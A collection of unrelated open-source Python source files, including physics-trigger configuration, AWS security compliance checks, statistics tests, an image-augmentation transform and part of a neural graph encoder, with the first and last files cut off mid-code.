d0Cut = cms.untracked.double(1000.0),
z0Cut = cms.untracked.double(1000.0),
recoCuts = cms.untracked.string("isStandAloneMuon && abs(eta) < 0.9"),
hltCuts = cms.untracked.string("abs(eta) < 0.9"),
)
endcapMuonParams = cms.PSet(
d0Cut = cms.untracked.double(1000.0),
z0Cut = cms.untracked.double(1000.0),
recoCuts = cms.untracked.string("isStandAloneMuon && abs(eta) > 1.4 && "
"abs(eta) < 2.0"),
hltCuts = cms.untracked.string("abs(eta) > 1.4 && abs(eta) < 2.0"),
)
allMuonParams = cms.PSet(
d0Cut = cms.untracked.double(1000.0),
z0Cut = cms.untracked.double(1000.0),
recoCuts = cms.untracked.string("isStandAloneMuon && abs(eta) < 2.0"),
hltCuts = cms.untracked.string("abs(eta) < 2.0"),
)
barrelAnalyzer = hltMuonOfflineAnalyzer.clone()
barrelAnalyzer.destination = "HLT/Muon/DistributionsBarrel"
barrelAnalyzer.targetParams = barrelMuonParams
barrelAnalyzer.probeParams = cms.PSet()
endcapAnalyzer = hltMuonOfflineAnalyzer.clone()
endcapAnalyzer.destination = "HLT/Muon/DistributionsEndcap"
endcapAnalyzer.targetParams = endcapMuonParams
endcapAnalyzer.probeParams = cms.PSet()
allAnalyzer = hltMuonOfflineAnalyzer.clone()
allAnalyzer.destination = "HLT/Muon/DistributionsAll"
allAnalyzer.targetParams = allMuonParams
allAnalyzer.probeParams = allMuonParams
hltMuonOfflineAnalyzers = cms.Sequence(
barrelAnalyzer *
endcapAnalyzer *
allAnalyzer
)
|
dbaas/account/serializers.py | didindinn/database-as-a-service | 303 | 12728296 | <reponame>didindinn/database-as-a-service
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from django_services.api import DjangoServiceSerializer
from .models import Team, AccountUser
class TeamSerializer(DjangoServiceSerializer):
class Meta:
model = Team
class UserSerializer(DjangoServiceSerializer):
class Meta:
model = AccountUser
|
eeauditor/auditors/aws/Amazon_EC2_Image_Builder_Auditor.py | kbhagi/ElectricEye | 442 | 12728306 | #This file is part of ElectricEye.
#SPDX-License-Identifier: Apache-2.0
#Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing,
#software distributed under the License is distributed on an
#"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
#KIND, either express or implied. See the License for the
#specific language governing permissions and limitations
#under the License.
import boto3
import datetime
import json
from check_register import CheckRegister
registry = CheckRegister()
imagebuilder = boto3.client("imagebuilder")
@registry.register_check("imagebuilder")
def imagebuilder_pipeline_tests_enabled_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[ImageBuilder.1] Image pipeline tests should be enabled"""
pipelines = imagebuilder.list_image_pipelines()
pipeline_list = pipelines["imagePipelineList"]
iso8601Time = datetime.datetime.now(datetime.timezone.utc).isoformat()
for arn in pipeline_list:
pipelineArn = arn["arn"]
pipeline_name = arn["name"]
image_pipelines = imagebuilder.get_image_pipeline(imagePipelineArn=pipelineArn)
image_test_config = image_pipelines["imagePipeline"]["imageTestsConfiguration"]
image_test_enabled = image_test_config["imageTestsEnabled"]
if image_test_enabled == True:
finding = {
"SchemaVersion": "2018-10-08",
"Id": pipelineArn + "/imagebuilder-pipeline-tests-enabled-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": pipelineArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[ImageBuilder.1] Image pipeline tests should be enabled",
"Description": "Image pipeline " + pipeline_name + " has tests enabled.",
"Remediation": {
"Recommendation": {
"Text": "For more information on EC2 Image Builder Security and enabling image testing refer to the Best Practices section of the Amazon EC2 Image Builder Developer Guide.",
"Url": "https://docs.aws.amazon.com/imagebuilder/latest/userguide/security-best-practices.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsImageBuilderPipeline",
"Id": pipelineArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"AwsImageBuilderPipeline": {"PipelineName": pipeline_name}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF ID.AM-2",
"NIST SP 800-53 CM-8",
"NIST SP 800-53 PM-5",
"AICPA TSC CC3.2",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.1.1",
"ISO 27001:2013 A.8.1.2",
"ISO 27001:2013 A.12.5.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": pipelineArn + "/imagebuilder-pipeline-tests-enabled-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": pipelineArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[ImageBuilder.1] Image pipeline tests should be enabled",
"Description": "Image pipeline " + pipeline_name + " does not have tests enabled.",
"Remediation": {
"Recommendation": {
"Text": "For more information on EC2 Image Builder Security and enabling image testing refer to the Best Practices section of the Amazon EC2 Image Builder Developer Guide.",
"Url": "https://docs.aws.amazon.com/imagebuilder/latest/userguide/security-best-practices.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsImageBuilderPipeline",
"Id": pipelineArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"AwsImageBuilderPipeline": {"PipelineName": pipeline_name}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF ID.AM-2",
"NIST SP 800-53 CM-8",
"NIST SP 800-53 PM-5",
"AICPA TSC CC3.2",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.1.1",
"ISO 27001:2013 A.8.1.2",
"ISO 27001:2013 A.12.5.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
@registry.register_check("imagebuilder")
def imagebuilder_ebs_encryption_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[ImageBuilder.2] Image recipes should encrypt EBS volumes"""
recipes = imagebuilder.list_image_recipes()
recipes_list = recipes["imageRecipeSummaryList"]
iso8601Time = datetime.datetime.now(datetime.timezone.utc).isoformat()
for details in recipes_list:
recipeArn = details["arn"]
recipe_name = details["name"]
recipe = imagebuilder.get_image_recipe(imageRecipeArn=recipeArn)
device_mapping = recipe["imageRecipe"]["blockDeviceMappings"]
list1 = device_mapping[0]
ebs = list1["ebs"]
ebs_encryption = ebs["encrypted"]
if ebs_encryption == True:
finding = {
"SchemaVersion": "2018-10-08",
"Id": recipeArn + "/imagebuilder-ebs-encryption-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": recipeArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[ImageBuilder.2] Image recipes should encrypt EBS volumes",
"Description": "Image recipe " + recipe_name + " has EBS encrypted.",
"Remediation": {
"Recommendation": {
"Text": "For more information on EC2 Image Builder Security and EBS encyption refer to the How EC2 Image Builder Works section of the Amazon EC2 Image Builder Developer Guide.",
"Url": "https://docs.aws.amazon.com/imagebuilder/latest/userguide/how-image-builder-works.html#image-builder-components",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsImageBuilderRecipe",
"Id": recipeArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"AwsImageBuilderRecipe": {"RecipeName": recipe_name}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF ID.AM-2",
"NIST SP 800-53 CM-8",
"NIST SP 800-53 PM-5",
"AICPA TSC CC3.2",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.1.1",
"ISO 27001:2013 A.8.1.2",
"ISO 27001:2013 A.12.5.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": recipeArn + "/imagebuilder-ebs-encryption-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": recipeArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[ImageBuilder.2] Image recipes should encrypt EBS volumes",
"Description": "Image recipe " + recipe_name + " does not have EBS encrypted.",
"Remediation": {
"Recommendation": {
"Text": "For more information on EC2 Image Builder Security and EBS encyption refer to the How EC2 Image Builder Works section of the Amazon EC2 Image Builder Developer Guide.",
"Url": "https://docs.aws.amazon.com/imagebuilder/latest/userguide/how-image-builder-works.html#image-builder-components",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsImageBuilderRecipe",
"Id": recipeArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"AwsImageBuilderRecipe": {"RecipeName": recipe_name}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF ID.AM-2",
"NIST SP 800-53 CM-8",
"NIST SP 800-53 PM-5",
"AICPA TSC CC3.2",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.1.1",
"ISO 27001:2013 A.8.1.2",
"ISO 27001:2013 A.12.5.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding |
examples/brtdp_example.py | david-abel/mdps | 230 | 12728315 | # Python imports.
from collections import defaultdict
import copy
# Other imports.
from simple_rl.planning import Planner
from simple_rl.planning import ValueIteration
from simple_rl.tasks import GridWorldMDP
from simple_rl.planning.BoundedRTDPClass import BoundedRTDP
class MonotoneLowerBound(Planner):
def __init__(self, mdp, name='MonotoneUpperBound'):
relaxed_mdp = MonotoneLowerBound._construct_deterministic_relaxation_mdp(mdp)
Planner.__init__(self, relaxed_mdp, name)
self.vi = ValueIteration(relaxed_mdp)
self.states = self.vi.get_states()
self.vi._compute_matrix_from_trans_func()
self.vi.run_vi()
self.lower_values = self._construct_lower_values()
@staticmethod
def _construct_deterministic_relaxation_mdp(mdp):
relaxed_mdp = copy.deepcopy(mdp)
relaxed_mdp.set_slip_prob(0.0)
return relaxed_mdp
def _construct_lower_values(self):
values = defaultdict()
for state in self.states:
values[state] = self.vi.get_value(state)
return values
class MonotoneUpperBound(Planner):
def __init__(self, mdp, name='MonotoneUpperBound'):
Planner.__init__(self, mdp, name)
self.vi = ValueIteration(mdp)
self.states = self.vi.get_states()
self.upper_values = self._construct_upper_values()
def _construct_upper_values(self):
values = defaultdict()
for state in self.states:
values[state] = 1. / (1. - self.gamma)
return values
def main():
test_mdp = GridWorldMDP(width=6, height=6, goal_locs=[(6, 6)], slip_prob=0.2)
lower_value_function = MonotoneLowerBound(test_mdp).lower_values
upper_value_function = MonotoneUpperBound(test_mdp).upper_values
bounded_rtdp = BoundedRTDP(test_mdp, lower_values_init=lower_value_function, upper_values_init=upper_value_function)
test_policy = bounded_rtdp.plan()
print('Derived policy:\n{}'.format(test_policy))
if __name__ == '__main__':
main()
|
tests/test_provider_circonus_labs_circonus.py | mjuenema/python-terrascript | 507 | 12728316 | <reponame>mjuenema/python-terrascript
# tests/test_provider_circonus-labs_circonus.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:13:59 UTC)
def test_provider_import():
import terrascript.provider.circonus_labs.circonus
def test_resource_import():
from terrascript.resource.circonus_labs.circonus import circonus_check
from terrascript.resource.circonus_labs.circonus import circonus_contact_group
from terrascript.resource.circonus_labs.circonus import circonus_dashboard
from terrascript.resource.circonus_labs.circonus import circonus_graph
from terrascript.resource.circonus_labs.circonus import circonus_maintenance
from terrascript.resource.circonus_labs.circonus import circonus_metric
from terrascript.resource.circonus_labs.circonus import circonus_overlay_set
from terrascript.resource.circonus_labs.circonus import circonus_rule_set
from terrascript.resource.circonus_labs.circonus import circonus_rule_set_group
from terrascript.resource.circonus_labs.circonus import circonus_worksheet
def test_datasource_import():
from terrascript.data.circonus_labs.circonus import circonus_account
from terrascript.data.circonus_labs.circonus import circonus_collector
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.circonus_labs.circonus
#
# t = terrascript.provider.circonus_labs.circonus.circonus()
# s = str(t)
#
# assert 'https://github.com/circonus-labs/terraform-provider-circonus' in s
# assert '0.12.2' in s
|
colorsublime/commands.py | adrianebohrer/Colorsublime-Plugin | 495 | 12728318 | """
Collection of functions the plugin can invoke. Most if not all should be
non-blocking (@async) functions to keep the main UI thread from freezing.
These functions should catch all unexpected exceptions so the plugin does not
have to. Unexpected exceptions should return False. Expected exceptions should
be caught by other modules this module uses. Log all unusual behavior.
All @async functions have an optional callback parameter as the last argument.
"""
import os
from . import logger
from . import settings
from . import http
from . import io
from .async import async
from .theme import Theme
log = logger.get(__name__)
def get_current_theme():
return settings.get_current_theme()
def get_installed_themes():
theme_filenames = os.listdir(settings.install_path())
themes = []
for t in theme_filenames:
if t.endswith('.tmTheme'):
name = t.replace('.tmTheme', '')
themes.append(Theme(name=name, file_name=t))
themes.sort()
return themes
@async
def fetch_repo():
""" Get current theme archive in a new thread """
archive = http.get(settings.repo_url())
io.extract(archive, settings.cache_path())
themes_list = io.read_json(settings.themes_list_path())
themes = [Theme.from_json(theme) for theme in themes_list]
themes = {t.name: t for t in themes}
return themes
def _exists(theme):
if not os.path.exists(theme.cache_path.abs):
log.error('Path %s not found!', theme.cache_path.abs)
return False
return True
def preview_theme(theme):
log.debug('Previewing theme %s at %s', theme.name, theme.cache_path.abs)
if not _exists(theme):
return
settings.set_theme(theme.cache_path.rel)
def install_theme(theme):
log.debug('Installing theme %s to %s', theme.name, theme.install_path.abs)
if not _exists(theme):
return
io.copy(theme.cache_path.abs, theme.install_path.abs)
settings.set_theme(theme.install_path.rel)
settings.commit()
def revert_theme(path):
log.debug('Reverting theme at path %s', path)
settings.set_theme(path)
def uninstall_theme(theme):
os.remove(theme.install_path.abs)
|
src/textual/views/_grid_view.py | dpoehls/textual | 6,706 | 12728326 | from ..view import View
from ..layouts.grid import GridLayout
class GridView(View, layout=GridLayout):
@property
def grid(self) -> GridLayout:
assert isinstance(self.layout, GridLayout)
return self.layout
|
notebooks/exercise_solutions/n03_kinematics_define-frame.py | pydy/pydy-tutorial-human-standing | 134 | 12728338 | upper_leg_frame = ReferenceFrame('U')
torso_frame = ReferenceFrame('T') |
tests/test_stats.py | almartin82/bayeslite | 964 | 12728355 | # -*- coding: utf-8 -*-
# Copyright (c) 2010-2016, MIT Probabilistic Computing Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
import pytest
import bayeslite.stats as stats
from bayeslite.math_util import relerr
def abserr(expected, actual):
"""Computes the absolute error between `expected` and `actual`.
:param float expected: The expected value.
:param float actual: The actual value.
:return: ``abs(actual-expected)``
:rtype: float
"""
return abs(actual - expected)
def test_pearsonr():
assert math.isnan(stats.pearsonr([], []))
assert stats.pearsonr([1,2,3], [2,4,6]) == +1.0
assert stats.pearsonr([1,2,3], [-2,-4,-6]) == -1.0
assert stats.pearsonr([1,2,3], [6,4,2]) == -1.0
assert stats.pearsonr([1,2,3], [+1,-1,+1]) == 0.0
def test_chi2_contingency():
assert stats.chi2_contingency([[42]]) == 0.
assert relerr(7.66, stats.chi2_contingency([[4,2,3], [3,16,2]])) < 0.01
def test_f_oneway():
data = [[6,8,4,5,3,4], [8,12,9,11,6,8], [13,9,11,8,7,12]]
assert relerr(9.3, stats.f_oneway(data)) < 0.01
def test_chi2_sf():
# Non-positive degrees of freedom should throw an error.
with pytest.raises(ValueError):
stats.chi2_sf(0, 0)
with pytest.raises(ValueError):
stats.chi2_sf(2, -10)
# Survival of x = 0 should be 1.
assert relerr(1., stats.chi2_sf(0,12)) < .05
assert relerr(1., stats.chi2_sf(0,6)) < .05
assert relerr(1., stats.chi2_sf(0,130)) < .05
# Test x < 1, x >= df against reference values.
assert relerr(.0357175, stats.chi2_sf(.8,.1)) < .05
assert relerr(.2730426, stats.chi2_sf(.6,.6)) < .05
assert relerr(.0602823, stats.chi2_sf(.1,.05)) < .05
# Test x >= 1, x <= df against reference values.
assert relerr(.7029304, stats.chi2_sf(9,12)) < .05
assert relerr(.5934191, stats.chi2_sf(1.9,3)) < .05
assert relerr(.9238371, stats.chi2_sf(1,4.2)) < .05
# Test x >= 1, x > df against reference values.
assert relerr(.3325939, stats.chi2_sf(8,7)) < .05
assert relerr(.0482861, stats.chi2_sf(3.9,1)) < .05
assert relerr(.3464377e-4, stats.chi2_sf(193,121)) < .05
def test_f_sf():
# Non-positive degrees of freedom should throw an error.
with pytest.raises(ValueError):
stats.f_sf(0,0,0)
with pytest.raises(ValueError):
stats.f_sf(2,-10,0)
with pytest.raises(ValueError):
stats.f_sf(2,0,-10)
with pytest.raises(ValueError):
stats.f_sf(2,-1,1)
with pytest.raises(ValueError):
stats.f_sf(2,1,-1)
# Survival of x = 0 should be 1.
assert relerr(1, stats.f_sf(0,1,12)) < .05
assert relerr(1, stats.f_sf(0,6,0.5)) < .05
assert relerr(1, stats.f_sf(0,130,121)) < .05
# Survival of x < 0 should be 1.
assert relerr(1, stats.f_sf(-1,1,12)) < .05
assert relerr(1, stats.f_sf(-100,6,0.5)) < .05
assert relerr(1, stats.f_sf(-0.02,130,121)) < .05
# Test against reference values.
assert relerr(.5173903, stats.f_sf(1,12,8)) < .05
assert relerr(.2618860, stats.f_sf(1.9,1,3)) < .05
assert relerr(.5000000, stats.f_sf(1,100,100)) < .05
assert relerr(.1781364, stats.f_sf(19,14,1)) < .05
assert relerr(.7306588, stats.f_sf(0.76,23,15)) < .05
assert relerr(.0602978, stats.f_sf(4.3,1,12)) < .05
assert relerr(.5590169, stats.f_sf(1.1,2,1)) < .05
assert relerr(.1111111, stats.f_sf(8,2,2)) < .05
assert relerr(.9999999, stats.f_sf(0.2,432,123)) < .05
assert relerr(.9452528, stats.f_sf(0.8,432,123)) < .05
assert relerr(.0434186, stats.f_sf(10,5,3)) < .05
# Test against reference very close to zero.
assert abserr(.0158130, stats.f_sf(11,19,4)) < .01
assert abserr(.0022310, stats.f_sf(14,9,6)) < .01
assert abserr(.1458691e-112, stats.f_sf(200,432,123)) < .01
assert abserr(.2489256e-13, stats.f_sf(29,23,29)) < .01
assert abserr(.1656276e-06, stats.f_sf(31,11,13)) < .01
assert abserr(.6424023e-5, stats.f_sf(18,14,12)) < .01
def test_t_cdf():
# Non-positive degrees of freedom should throw an error.
with pytest.raises(ValueError):
stats.t_cdf(0,0)
with pytest.raises(ValueError):
stats.t_cdf(2,-10)
# CDF of x = 0 should be 0.5.
assert relerr(.5, stats.t_cdf(0,12)) < .01
assert relerr(.5, stats.t_cdf(0,6)) < .01
assert relerr(.5, stats.t_cdf(0,130)) < .01
# Test against various reference values.
assert relerr(.57484842931039226, stats.t_cdf(.8, .1)) < .05
assert relerr(.64922051214061649, stats.t_cdf(.6, .6)) < .05
assert relerr(.51046281131211058, stats.t_cdf(.1, .05)) < .05
assert relerr(.99999944795492968, stats.t_cdf(9, 12)) < .05
assert relerr(.92318422834700042, stats.t_cdf(1.9, 3)) < .05
assert relerr(.81430689864299455, stats.t_cdf(1, 4.2)) < .05
assert relerr(.99995442539414559, stats.t_cdf(8, 7)) < .05
assert relerr(.92010336338282994, stats.t_cdf(3.9, 1)) < .05
assert relerr(1.0, stats.t_cdf(193, 121)) < .05
assert relerr(.42515157068960779, stats.t_cdf(-.8, .1)) < .05
assert relerr(.35077948785938345, stats.t_cdf(-.6, .6)) < .05
assert relerr(.48953718868788948, stats.t_cdf(-.1, .05)) < .05
assert relerr(.076815771652999562, stats.t_cdf(-1.9, 3)) < .05
assert relerr(.18569310135700545, stats.t_cdf(-1, 4.2)) < .05
assert relerr(.17530833141010374, stats.t_cdf(-1, 7)) < .05
assert relerr(.079896636617170003, stats.t_cdf(-3.9, 1)) < .05
assert relerr(.30899158341328747, stats.t_cdf(-0.5, 121)) < .05
# Test against reference very close to zero.
# XXX Why are we testing chi2_sf here?
assert relerr(.346437e-4, stats.chi2_sf(193,121)) < .01
def test_gauss_suff_stats():
# High mean, tiny variance would lead to catastrophic cancellation
# in a naive implementation that maintained the sum of squares.
big = 400
small = 0.0000001
data = [big - small, big, big + small]
true_sigma = math.sqrt(2 * small**2 / 3)
(ct, mean, sigma) = stats.gauss_suff_stats(data)
assert ct == 3
assert mean == big
assert relerr(true_sigma, sigma) < 1e-5
|
jesse/strategies/Test38/__init__.py | noenfugler/jesse | 3,999 | 12728373 | from jesse.strategies import Strategy
# test_average_take_profit_exception
class Test38(Strategy):
def should_long(self) -> bool:
return self.index == 0
def should_short(self) -> bool:
return False
def go_long(self):
qty = 1
self.buy = qty, 2
self.stop_loss = qty, 1
def go_short(self):
pass
def should_cancel(self):
return False
def filters(self):
return [self.filter_1]
def filter_1(self):
# trying to access average_take_profit without setting it first
return self.average_take_profit > 1
|
albumentations/augmentations/dropout/mask_dropout.py | Multihuntr/albumentations | 3,893 | 12728403 | import random
from typing import Union, Tuple, Any, Dict
import cv2
import numpy as np
from skimage.measure import label
from ...core.transforms_interface import DualTransform
from ...core.transforms_interface import to_tuple
__all__ = ["MaskDropout"]
class MaskDropout(DualTransform):
"""
Image & mask augmentation that zero out mask and image regions corresponding
to randomly chosen object instance from mask.
Mask must be single-channel image, zero values treated as background.
Image can be any number of channels.
Inspired by https://www.kaggle.com/c/severstal-steel-defect-detection/discussion/114254
Args:
max_objects: Maximum number of labels that can be zeroed out. Can be tuple, in this case it's [min, max]
image_fill_value: Fill value to use when filling image.
Can be 'inpaint' to apply inpaining (works only for 3-chahnel images)
mask_fill_value: Fill value to use when filling mask.
Targets:
image, mask
Image types:
uint8, float32
"""
def __init__(
self,
max_objects: int = 1,
image_fill_value: Union[int, float, str] = 0,
mask_fill_value: Union[int, float] = 0,
always_apply: bool = False,
p: float = 0.5,
):
super(MaskDropout, self).__init__(always_apply, p)
self.max_objects = to_tuple(max_objects, 1)
self.image_fill_value = image_fill_value
self.mask_fill_value = mask_fill_value
@property
def targets_as_params(self):
return ["mask"]
def get_params_dependent_on_targets(self, params) -> Dict[str, Any]:
mask = params["mask"]
label_image, num_labels = label(mask, return_num=True)
if num_labels == 0:
dropout_mask = None
else:
objects_to_drop = random.randint(self.max_objects[0], self.max_objects[1])
objects_to_drop = min(num_labels, objects_to_drop)
if objects_to_drop == num_labels:
dropout_mask = mask > 0
else:
labels_index = random.sample(range(1, num_labels + 1), objects_to_drop)
dropout_mask = np.zeros((mask.shape[0], mask.shape[1]), dtype=bool)
for label_index in labels_index:
dropout_mask |= label_image == label_index
params.update({"dropout_mask": dropout_mask})
return params
def apply(self, img: np.ndarray, dropout_mask: np.ndarray = None, **params) -> np.ndarray:
if dropout_mask is None:
return img
if self.image_fill_value == "inpaint":
dropout_mask = dropout_mask.astype(np.uint8)
_, _, w, h = cv2.boundingRect(dropout_mask)
radius = min(3, max(w, h) // 2)
img = cv2.inpaint(img, dropout_mask, radius, cv2.INPAINT_NS)
else:
img = img.copy()
img[dropout_mask] = self.image_fill_value
return img
def apply_to_mask(self, img: np.ndarray, dropout_mask: np.ndarray = None, **params) -> np.ndarray:
if dropout_mask is None:
return img
img = img.copy()
img[dropout_mask] = self.mask_fill_value
return img
def get_transform_init_args_names(self) -> Tuple[str, ...]:
return "max_objects", "image_fill_value", "mask_fill_value"
|
model/central.py | Misterion777/ConceptFlow | 107 | 12728432 | <filename>model/central.py
#coding:utf-8
import torch
import numpy as np
from torch.autograd import Variable
import torch.nn as nn
from torch.nn import utils as nn_utils
from .embedding import WordEmbedding, EntityEmbedding, use_cuda, VERY_SMALL_NUMBER, VERY_NEG_NUMBER
class CentralEncoder(nn.Module):
def __init__(self, config, gnn_layers, embed_units, trans_units, word_embedding, entity_embedding):
super(CentralEncoder, self).__init__()
self.k = 2 + 1
self.gnn_layers = gnn_layers
self.WordEmbedding = word_embedding
self.EntityEmbedding = entity_embedding
self.embed_units = embed_units
self.trans_units = trans_units
self.pagerank_lambda = config.pagerank_lambda
self.fact_scale = config.fact_scale
self.node_encoder = nn.LSTM(input_size = self.embed_units, hidden_size = self.trans_units, batch_first=True, bidirectional=False)
self.lstm_drop = nn.Dropout(p = config.lstm_dropout)
self.softmax_d1 = nn.Softmax(dim = 1)
self.linear_drop = nn.Dropout(p = config.linear_dropout)
self.relu = nn.ReLU()
for i in range(self.gnn_layers):
self.add_module('q2e_linear' + str(i), nn.Linear(in_features=self.trans_units, out_features=self.trans_units))
self.add_module('d2e_linear' + str(i), nn.Linear(in_features=self.trans_units, out_features=self.trans_units))
self.add_module('e2q_linear' + str(i), nn.Linear(in_features=self.k * self.trans_units, out_features=self.trans_units))
self.add_module('e2d_linear' + str(i), nn.Linear(in_features=self.k * self.trans_units, out_features=self.trans_units))
self.add_module('e2e_linear' + str(i), nn.Linear(in_features=self.k * self.trans_units, out_features=self.trans_units))
#use kb
self.add_module('kb_head_linear' + str(i), nn.Linear(in_features=self.trans_units, out_features=self.trans_units))
self.add_module('kb_tail_linear' + str(i), nn.Linear(in_features=self.trans_units, out_features=self.trans_units))
self.add_module('kb_self_linear' + str(i), nn.Linear(in_features=self.trans_units, out_features=self.trans_units))
def forward(self, batch_size, max_local_entity, max_fact, query_text, local_entity, q2e_adj_mat, kb_adj_mat, kb_fact_rel, query_mask):
# normalized adj matrix
pagerank_f = use_cuda(Variable(torch.from_numpy(q2e_adj_mat).type('torch.FloatTensor'), requires_grad=True))
q2e_adj_mat = use_cuda(Variable(torch.from_numpy(q2e_adj_mat).type('torch.FloatTensor'), requires_grad=False))
assert pagerank_f.requires_grad == True
# encode query
query_word_emb = self.WordEmbedding(query_text)
query_hidden_emb, (query_node_emb, _) = self.node_encoder(self.lstm_drop(query_word_emb), self.init_hidden(1, batch_size, self.trans_units))
query_node_emb = query_node_emb.squeeze(dim=0).unsqueeze(dim=1)
query_rel_emb = query_node_emb
# build kb_adj_matrix from sparse matrix
(e2f_batch, e2f_f, e2f_e, e2f_val), (f2e_batch, f2e_e, f2e_f, f2e_val) = kb_adj_mat
entity2fact_index = torch.LongTensor([e2f_batch, e2f_f, e2f_e])
entity2fact_val = torch.FloatTensor(e2f_val)
entity2fact_mat = use_cuda(torch.sparse.FloatTensor(entity2fact_index, entity2fact_val, torch.Size([batch_size, max_fact, max_local_entity])))
fact2entity_index = torch.LongTensor([f2e_batch, f2e_e, f2e_f])
fact2entity_val = torch.FloatTensor(f2e_val)
fact2entity_mat = use_cuda(torch.sparse.FloatTensor(fact2entity_index, fact2entity_val, torch.Size([batch_size, max_local_entity, max_fact])))
local_fact_emb = self.EntityEmbedding(kb_fact_rel)
# attention fact2question
div = float(np.sqrt(self.trans_units))
fact2query_sim = torch.bmm(query_hidden_emb, local_fact_emb.transpose(1, 2)) / div
fact2query_sim = self.softmax_d1(fact2query_sim + (1 - query_mask.unsqueeze(dim=2)) * VERY_NEG_NUMBER)
fact2query_att = torch.sum(fact2query_sim.unsqueeze(dim=3) * query_hidden_emb.unsqueeze(dim=2), dim=1)
W = torch.sum(fact2query_att * local_fact_emb, dim=2) / div
W_max = torch.max(W, dim=1, keepdim=True)[0]
W_tilde = torch.exp(W - W_max)
e2f_softmax = self.sparse_bmm(entity2fact_mat.transpose(1, 2), W_tilde.unsqueeze(dim=2)).squeeze(dim=2)
e2f_softmax = torch.clamp(e2f_softmax, min=VERY_SMALL_NUMBER)
e2f_out_dim = use_cuda(Variable(torch.sum(entity2fact_mat.to_dense(), dim=1), requires_grad=False))
# load entity embedding
local_entity_emb = self.EntityEmbedding(local_entity)
# label propagation on entities
for i in range(self.gnn_layers):
# get linear transformation functions for each layer
q2e_linear = getattr(self, 'q2e_linear' + str(i))
d2e_linear = getattr(self, 'd2e_linear' + str(i))
e2q_linear = getattr(self, 'e2q_linear' + str(i))
e2d_linear = getattr(self, 'e2d_linear' + str(i))
e2e_linear = getattr(self, 'e2e_linear' + str(i))
kb_self_linear = getattr(self, 'kb_self_linear' + str(i))
kb_head_linear = getattr(self, 'kb_head_linear' + str(i))
kb_tail_linear = getattr(self, 'kb_tail_linear' + str(i))
# start propagation
next_local_entity_emb = local_entity_emb
